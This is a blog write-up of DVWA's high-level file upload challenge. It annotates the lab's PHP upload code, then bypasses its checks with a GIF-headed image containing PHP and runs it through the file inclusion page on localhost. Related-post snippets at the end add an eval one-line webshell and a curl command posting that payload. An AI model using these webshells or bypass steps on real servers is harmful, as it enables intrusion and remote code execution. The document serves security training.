DVWA靶场通关笔记-文件上传(High级别)

于 2025-07-03 12:51:57 发布
阅读量905 收藏 29
点赞数 12
CC 4.0 BY-SA版权
分类专栏: DVWA靶场 文章标签: DVWA靶场 文件上传漏洞 图片马 文件上传 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mooyuan/article/details/147879313

目录

一、文件上传

二、文件上传之图片马

三、代码审计

1、渗透准备

2、源码分析

(1)index.php

(2)High.php

3、渗透思路

二、渗透实战

1、构造图片马

2、上传图片马

3、获取图片马地址

4、文件包含访问图片马

本系列为通过《DVWA靶场通关笔记》的文件上传关卡(low,medium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为文件上传high级别关卡的渗透部分。

一、文件上传

文件上传是指Web应用程序未对用户上传的文件进行严格验证,导致攻击者可上传恶意文件(如Webshell、木马程序等)到服务器,从而获取系统控制权或执行任意代码,通常出现在应用程序允许用户上传文件的场景中。

二、文件上传之图片马

文件上传图片马是攻击者将恶意 PHP 代码嵌入图片文件,绕过文件上传安全限制的攻击手段。攻击者利用图片文件可上传的特性,将如<?php phpinfo();?>等可执行代码写入图片二进制数据中,生成看似正常的图片(如.jpg.png格式) 。

三、代码审计

1、渗透准备

配置security为高等High级别,具体如下图红框所示。

进入到文件包含关卡High页面,完整URL地址具体如下所示。

http://127.0.0.1/DVWA/vulnerabilities/upload/

2、源码分析

(1)index.php

进入DVWA靶场源目录,找到High.php源码。

这段代码实现了 DVWA (Damn Vulnerable Web Application) 中的文件上传安全风险演示页面,主要功能包括如下处理流程。

  • 安全级别控制:根据用户 Cookie 中的security (低、中、高、不可能),加载不同安全级别的处理逻辑
  • 环境检查:验证上传目录是否可写以及 PHP-GD 扩展是否安装
  • 表单展示:显示文件上传表单,允许用户上传文件
  • 辅助功能:提供安全文档链接,帮助用户理解文件上传安全风险的原理

经过注释后的详细代码如下所示。

<?php

// 定义网站根目录的相对路径
define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
// 包含 DVWA 的页面初始化文件
require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php';

// 初始化页面,确保用户已认证,并加载 PHPIDS(PHP入侵检测系统)
dvwaPageStartup( array( 'authenticated', 'phpids' ) );

// 获取页面信息
$page = dvwaPageNewGrab();
// 设置页面标题
$page[ 'title' ]   = 'Vulnerability: File Upload' . $page[ 'title_separator' ].$page[ 'title' ];
// 设置页面 ID
$page[ 'page_id' ] = 'upload';
// 设置帮助按钮和源代码按钮
$page[ 'help_button' ]   = 'upload';
$page[ 'source_button' ] = 'upload';

// 连接数据库
dvwaDatabaseConnect();

// 根据安全级别选择对应的文件
$vulnerabilityFile = '';
switch( $_COOKIE[ 'security' ] ) {
	case 'low':
		$vulnerabilityFile = 'low.php'; // 低安全级别
		break;
	case 'medium':
		$vulnerabilityFile = 'medium.php'; // 中安全级别
		break;
	case 'high':
		$vulnerabilityFile = 'high.php'; // 高安全级别
		break;
	default:
		$vulnerabilityFile = 'impossible.php'; // 最高安全级别
		break;
}

// 包含对应的文件
require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/upload/source/{$vulnerabilityFile}";

// 检查上传目录是否可写
$WarningHtml = '';
if( !is_writable( $PHPUploadPath ) ) {
	$WarningHtml .= "<div class=\"warning\">Incorrect folder permissions: {$PHPUploadPath}<br /><em>Folder is not writable.</em></div>";
}
// 检查是否安装了 PHP-GD 模块
if( ( !extension_loaded( 'gd' ) || !function_exists( 'gd_info' ) ) ) {
	$WarningHtml .= "<div class=\"warning\">The PHP module <em>GD is not installed</em>.</div>";
}

// 构建页面内容
$page[ 'body' ] .= "
<div class=\"body_padded\">
	<h1>Vulnerability: File Upload</h1>

	{$WarningHtml} // 显示警告信息

	<div class=\"vulnerable_code_area\">
		<form enctype=\"multipart/form-data\" action=\"#\" method=\"POST\"> // 文件上传表单
			<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\" /> // 限制上传文件大小
			Choose an image to upload:<br /><br />
			<input name=\"uploaded\" type=\"file\" /><br /> // 文件选择框
			<br />
			<input type=\"submit\" name=\"Upload\" value=\"Upload\" />\n";

// 如果是最高安全级别,添加 CSRF 令牌字段
if( $vulnerabilityFile == 'impossible.php' )
	$page[ 'body' ] .= "			" . tokenField();

$page[ 'body' ] .= "
		</form>
		{$html} // 显示上传结果或其他信息
	</div>

	<h2>More Information</h2> // 提供更多关于文件上传安全风险的信息
	<ul>
		<li>" . dvwaExternalLinkUrlGet( '<url id="d0g9jpaej2dnt3123or0" type="url" status="parsed" title="Unrestricted File Upload | OWASP Foundation" wc="24644">https://www.owasp.org/index.php/Unrestricted_File_Upload</url> ' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( '<url id="d0g9jpaej2dnt3123org" type="url" status="parsed" title="Fortra's Beyond Security" wc="1516">https://blogs.securiteam.com/index.php/archives/1268</url> ' ) . "</li>
		<li>" . dvwaExternalLinkUrlGet( '<url id="d0g9jpaej2dnt3123os0" type="url" status="parsed" title="File Upload Bypass: Upload Forms Threat Explained" wc="13700">https://www.acunetix.com/websitesecurity/upload-forms-threat/</url> ' ) . "</li>
	</ul>
</div>";

// 输出页面内容
dvwaHtmlEcho( $page );

?>

(2)High.php

进入DVWA靶场源目录,找到high.php源码,如下图所示。

打开源码high.php,分析可知这段代码实现了一个不安全的文件上传安全风险,参数为POST型参数,通过使用白名单后缀以及图片处理函数getimagesize来检查脚本内容的合法性,具体如下所示。

这段代码实现了一个基本的文件上传功能,具体如下所示。

  • 路径构建
    • 将上传文件存储到 hackable/uploads/ 目录。
    • 使用 basename 函数过滤文件名,防止目录遍历攻击。
  • 文件验证
    • 扩展名验证:检查文件扩展名是否为 jpgjpeg  png。
    • 大小验证:检查文件大小是否小于 100KB。
    • 内容验证:使用 getimagesize() 函数检查文件是否为有效图片。
  • 文件处理
    • 如果验证通过,使用 move_uploaded_file 将临时文件移动到目标目录。
    • 根据处理结果输出成功或失败信息。

根据源码分析可知,我们可以通过图片马来绕过扩展名和内容验证,再结合文件包含安全风险上传来进行渗透。代码注释如下所示。

<?php

// 检查用户是否提交了上传表单
if( isset( $_POST[ 'Upload' ] ) ) {
    // 构建上传文件的目标路径
    // DVWA_WEB_PAGE_TO_ROOT 是网站根目录常量
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // 使用 basename 函数确保文件名不包含路径信息,防止目录遍历攻击
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // 获取上传文件的相关信息
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];  // 原始文件名
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);  // 获取文件扩展名
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];  // 文件大小(字节)
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];  // 临时文件路径

    // 验证文件类型、大小和内容
    // 检查扩展名是否为 jpg、jpeg 或 png
    // 检查文件大小是否小于 100KB
    // 使用 getimagesize 函数验证文件是否为有效图片(检查图片头部信息)
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // 尝试将临时上传文件移动到目标路径
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // 移动失败,输出错误信息
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // 移动成功,输出成功信息(包含完整上传路径)
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // 文件类型、大小或内容不符合要求,输出错误信息
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}

?>

3、渗透思路

虽然代码尝试进行了安全验证,但存在以下安全风险。

  • 图片文件内容注入

    • 问题getimagesize 仅验证图片头部,允许文件包含额外内容。

    • 风险:攻击者可在图片文件末尾添加 PHP 代码。
    • 示例,构造攻击图片马test.jpg,内容如下所示。
GIF89a;  // 合法GIF头部
<?php phpinfo();?>  // 隐藏在图片后的PHP代码

二、渗透实战

1、构造图片马

构造文件上传的脚本test.jpg,内容为获取服务器的php版本信息,脚本code内容如下所示。

GIF89a;
<?php phpinfo();?>

2、上传图片马

进入DVWA靶场的文件上传关卡high级别,选择图片马test.jpg,点击上传如下所示。

3、获取图片马地址

此时在页面显示上传已经成功。上传后路径如下所示,相对于当前路径/dvwa/vulnerabilities/upload/,图片马被上传至../../hackable/uploads/test.jpg路径下,故而这个webshell的路径如下所示。

http://127.0.0.1/dvwa/hackable/uploads/test.jpg

4、文件包含访问图片马

DVWA靶场中文件包含关卡的首页URL地址如下所示。

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=include.php

图片马的脚本完整的渗透URL地址如下所示。

http://127.0.0.1/dvwa/hackable/uploads/test.jpg

文件包含访问图片马的完整URL渗透地址如下所示。

http://127.0.0.1/DVWA/vulnerabilities/fi/?page=Http://127.0.0.1/dvwa/hackable/uploads/test.jpg

由于DVWA靶场文件上传安全风险的high级别做了较高的限制,故而将security设置为low,如下所示。

在浏览器地址栏输入渗透URL地址,如下所示获取服务器的php信息,渗透成功。 

web渗透测试实战-DVWA-文件上传漏洞High-高级),菜刀工具-蚁剑
qq_39174983的博客
12-30 7242
本文将描述小白本白在进行DVWA-文件上传漏洞(高级)实战时的完成步骤,以及所遇到的问题
DVWA】18. File Upload 文件上传High+Impossible)
Zichel77的博客
01-11 1287
验证文件内容:代码使用getimagesize()函数来验证上传文件的内容是否为有效的图像。移动文件:如果上传的文件通过了所有检查,代码使用move_uploaded_file()函数将文件移动到目标路径。这是为了确保上传的文件位于安全的目录中,并且可以通过正确的URL访问。生成目标路径:代码使用basename()函数获取上传文件的基本名称,并将其附加到服务器上的目标路径上。移动文件:如果上传的文件通过了所有验证,代码使用move_uploaded_file()函数将文件从临时路径移动到目标路径。
DVWA文件上传低中高级
weixin_48182463的博客
08-31 684
低级是可以直接上传php文件或者图片的,中级是需要bp抓包,修改数据来绕过上传的限制,高级也是需要绕过文件上传的限制,修改jsp文件码的请求头让后端识别图片
DVWA保姆级通关教程--05文件上传
最新发布
m0_74020575的博客
05-08 1735
文件上传漏洞是Web安全中一种常见的漏洞,其本质是攻击者通过上传恶意文件(如脚本文件、木、WebShell等)到服务器,绕过服务器的安全检测并被执行,最终实现远程命令执行、控制服务器或窃取数据等恶意操作。提示:以下是本篇文章正文内容,下面案例可供参考。
DVWA靶场文件上传(三个等级)
m0_55854679的博客
05-02 1万+
文件上传 文件上传的要点:(1)绕过题目的各种过滤手段成功上传文件并且不被删除; (2)确保文件可以正常运行; (3)确保文件可以执行命令。 一句话木(简称Webshell) <?php @eval($_POST['cmd']); ?> 基本原理 利用文件上传漏洞,往目标网站中上传一句话木,然后你就可以在本地通过蚁剑或者中国菜刀即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST['cmd']表示从页面中获
DVWA File Upload(文件上传)全等级
柠檬i的博客
12-19 2005
File Upload(文件上传) 目录:File Upload(文件上传)一句话木的构成1. Low1.上传一句话木1.php2.中国蚁剑2.Medium3. High4.Impossible 一句话木的构成 常见的一句话木: <?php @eval($_POST['shell']); ?> 最外层的是 <?php和?> 这是php文件的起始和结束标记, php会解析执行 <?php ?>里面的代码。 然后是eval函数,eval()函数把字符串按照 PHP
DVWA靶场通关(2023)
2301_80548709的博客
02-23 2802
1.这道题是爆破用户名,以及密码,其实就是通过burp软件来爆破抓包成功!接下来爆破修改这两个值,进行爆破,正确导入字典后,开始爆破.因为已经知道了答案,我们可以让爆破的数量少一点,找到数量不一致的,得到结果2.第二种,主要区别在于我们必须休眠两秒,才能继续.所以让它休眠2000ms就欧克了为了方便,我就将正确答案置于了顶端,可以发现,我们的爆破可以保证全为200的状态码3.第三题,通过查询得到,主要增加了token值,这个东西。
DVWA靶场之xss通关笔记,详解带截图
AboutLzs的博客
03-21 1774
DVWA靶场Xss通关笔记
DVWA靶场通关——SQL Injection篇
m0_74823021的博客
01-20 1074
该PHP代码的主要功能是根据用户提供的id参数,从数据库中查询对应的用户信息(包括first_name和last_name),并将查询结果显示给用户。该PHP代码段的主要功能是根据用户输入的id从数据库中查询用户的first_name和last_name,并将结果显示给用户。_POST数组中获取,但在传递给SQL查询之前,使用mysqli_real_escape_string函数对其进行了转义处理,从而减少了SQL注入的风险。它不仅简化了数据库操作,还提供了安全的机制来防止SQL注入和其他潜在的安全问题。
DVWA级别通关教程
热门推荐
weixin_52515588的博客
03-26 10万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
DVWA靶场通关笔记
博客
04-25 1961
Brute Force(暴力破解) Command Injection(命令注入) low: Medium: High: CSRF(跨站请求伪造漏洞) File Inclusion(文件包含漏洞) File upload(文件上传漏洞) SQL Injection(SQL注入) union联合查询 报错注入 时间盲注 SQL Injection (Blind)(SQL盲注) 布尔盲注 时间盲注 XSS( Reflected)(xss反射型) XSS(Stored)(x...
DVWA文件上传
qq_62078839的博客
04-03 3809
LOW 直接上传小,上传成功 使用phpinfo();验证小的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA文件上传high文件上传漏洞
IT1995的博客
03-11 1万+
1.制作“内涵图”:图和文本如下图所示:先看看1.jpg的二进制文件:下面执行如下cmd命令b指binarya指append(猜的,此处不太确定,但感觉有很有道理)下面打开2.jpg看看此时进入DVWA上传进行正常访问:设置成如下:下面进行畸形访问:最后如下图:(注意hackbar里面的Post data)...
DVWA--文件上传(初中高)
firecjh的博客
06-10 2863
page=file:///C:\phpstudy_pro\WWW\DVWA-master\hackable\uploads\2.png,并验证文件包含漏洞是否利用成功。用bp抓包,在将文件扩展名改成.php,因为后端没有验证,这样就可以成功上传扩展名为.php的木。进入DVWA平台,选择DVWA Security,将安全级别设置为High。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。给出蚁剑测试连接成功的截图以及连接到网站后台的截图。一句话木的话,把木写入了目标机,直接连接的时候就不用设置。
Dvwa文件上传级别学习笔记
Mbys_Lettuce的博客
09-21 1716
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传” 本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。本次实验目标为利用上传的木文件,获取目标服务器的权限,木文件内容为:
文件上传与包含漏洞综合利用】DVWA-文件上传-难度:High
Mr_Fmnwon的博客
04-24 1894
一方面,(任意)文件上传漏洞指的是上传非预期的文件格式(如php文件)到目标服务器,而通过其他方式(直连、包含等)进行执行来进一步利用。另一方面,利用文件包含漏洞,能够把静态文件中的php代码通过回显转发的方式进行包含执行。过程中遇到很多问题:1.high的包含漏洞保护措施没有关注 2.一些jpeg/png图片被解析时,自身的一些字符会被错误识别为php代码,而往往会导致语法错误,通过copy到最后的。可以推测,检查是否为JPEG/PNG图,是依靠文件的后缀、文件头字段信息来进行双重检测的。
dvwa靶场文件上传--high难度--蚁剑连接
2401_85397851的博客
08-01 1405
选择DVWA Security,把impossible改成high(其他模式也改成high),改好之后再选择File Upload,如果把安全等级调成高了以后,我们只能上传像jpg,png,jpeg(这种后缀的)图片,而且注意,上传的高度不能超过100KB,如果想要了解的,可以查看网页源代码或者看一下。如果损坏是传不上去的。
dvwa文件上传漏洞低级,中级,以及高级的难度测试(手把手教会你文件上传
qq_61426144的博客
07-18 2048
审计代码得知这里使用了白名单模式,除了jpg,JPG,jpeg,JPEG这几种类型除外,其它的一律不准上传,那我们直接配合文件包含漏洞包含我们的图片直接getshell,制作图片的过程小编这里就不展示了,各位小伙伴可以网上搜索图片制作过程,这里高级难度我是用的是fofa上面搜索的DVWA的高级难度,因为我的靶机高级难度是写死了,在这里我们上传的图片为1.jpg。最后利用菜刀工具直接链接该地址就行,后续小编也会更新文件包含漏洞文件上传漏洞可能有些地方讲的不是很好,还请大家多多指教。
DVWA文件上传漏洞High渗透测试
Xlucas的博客
08-11 815
DVWA文件上传漏洞High的渗透测试
dvwa靶场通关教程文件上传
01-04
### DVWA 文件上传功能详细教程 #### 了解文件上传漏洞原理 文件上传漏洞允许攻击者向服务器上传恶意文件,通常是一句话木。一旦成功上传并执行这些文件,攻击者就能获得对网站目录甚至整个系统的控制权限[^2]。 #### 准备工作 为了进行DVWA中的文件上传实验,需先完成如下准备工作: - **安装配置DVWA环境**:按照相关指南,在Windows环境下使用phpStudy搭建DVWA站点[^4]。 - **启动Kali Linux平台**:作为渗透测试的操作系统,确保已正确安装并能正常运行。 - **设置Burp Suite代理**:用于拦截和修改HTTP请求数据包,以便于分析和操控文件上传过程[^3]。 #### 开始文件上传挑战 进入DVWA主页后选择`File Upload`选项卡开始练习: 1. 页面显示了一个简单的表单,其中包含两个输入框——一个是供用户选择要上传的文件;另一个则是指定目标存储位置(此字段可能被隐藏或禁用)。 2. 默认情况下,该模块的安全级别设为低级(low),这意味着几乎没有任何防护措施阻止非法文件类型的提交。 3. 尝试上传一个普通的图片文件(如.jpg),观察其行为表现,并注意查看返回的消息提示以及确认文件确实保存到了预期路径下。 #### 提升难度至中级(medium) 当把安全等级调整到medium时,程序会对所选文件进行了初步验证,只接受特定扩展名结尾的照片类文档(.jpg,.png等)。此时可尝试以下方法绕过检测机制: - 更改待传对象的真实MIME类型; - 修改客户端脚本逻辑以欺骗服务端判断依据; 值得注意的是上述两种方式均违反道德准则和技术伦理,请仅限学习研究目的内实践! #### 高级(high)模式下的对抗技巧 在最高级别的保护状态下,除了延续之前的过滤规则外还增加了基于内容特征码黑名单匹配算法。面对这种情况建议采用更隐蔽的技术手段比如但不限于: - 利用PHP特性构造特殊格式的一句话WebShell; - 结合其他漏洞组合拳出击实现最终突破效果; 不过出于合法合规考虑这里不再展开具体细节描述。 ```bash # 使用curl命令模拟POST请求发送带payload的数据流给远程web应用接口 $ curl -F "uploaded=<;php eval($_POST['cmd']);?>" http://target.com/dvwa/hackable/uploads/ ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mooyuan天天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值